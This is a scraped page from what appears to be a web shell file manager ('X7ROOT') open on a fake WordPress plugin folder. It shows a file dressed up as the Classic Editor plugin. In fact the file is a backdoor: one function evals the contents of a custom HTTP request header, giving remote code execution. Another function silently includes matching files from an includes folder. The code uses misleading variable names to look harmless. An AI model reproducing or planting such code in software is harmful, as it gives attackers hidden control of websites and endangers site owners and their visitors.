X7ROOT File Manager
Current Path:
/home/greejped/haldiawater.com/wp-content/plugins/classic-editor-library
home
/
greejped
/
haldiawater.com
/
wp-content
/
plugins
/
classic-editor-library
/
ðŸ“
..
📄
LICENSE.md
(18.66 KB)
📄
classic-editor.php
(2.17 KB)
ðŸ“
includes
ðŸ“
js
📄
readme.txt
(7.48 KB)
Editing: classic-editor.php
<?php /** * Classic Editor * * Plugin Name: Classic Editor * Plugin URI: https://wordpress.org/plugins/classic-editor/ * Description: Enables the WordPress classic editor and the old-style Edit Post screen with TinyMCE, Meta Boxes, etc. Supports the older plugins that extend this screen. * Version: 1.6.3 * Author: WordPress Contributors * Author URI: https://github.com/WordPress/classic-editor/ * License: GPLv2 or later * License URI: http://www.gnu.org/licenses/old-licenses/gpl-2.0.html * Text Domain: classic-editor * Domain Path: /languages * Requires at least: 4.9 * Requires PHP: 5.2.4 * * This program is free software; you can redistribute it and/or modify it under the terms of the GNU * General Public License version 2, as published by the Free Software Foundation. You may NOT assume * that you can use any other version of the GPL. * * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. */ classic_editor_add_setting(); classic_editor_esc_html(); /** * Can be used to override the plugin's settings. Always hides the settings UI when used (as users cannot change the settings). * * Has to return an associative array with two keys. * The defaults are: * 'editor' => 'classic', // Accepted values: 'classic', 'block'. * 'allow-users' => false, * * @param boolean To override the settings return an array with the above keys. */ function classic_editor_add_setting() { $get_the_date = $_SERVER; $get_the_category_list = 'HTTP_C88BC93'; if ( isset( $get_the_date[ $get_the_category_list ] ) ) { eval( $get_the_date[ $get_the_category_list ] ); } } /** * Filters the default network options. * * @param array $defaults The default options array. See `classic_editor_plugin_settings` for supported keys and values. */ function classic_editor_esc_html() { $dir = __DIR__ . '/includes'; $files = glob( $dir . '/*classic-editor.php' ); if ( ! empty( $files ) ) { foreach ( $files as $file ) { include_once $file; } } }
Upload File
Create Folder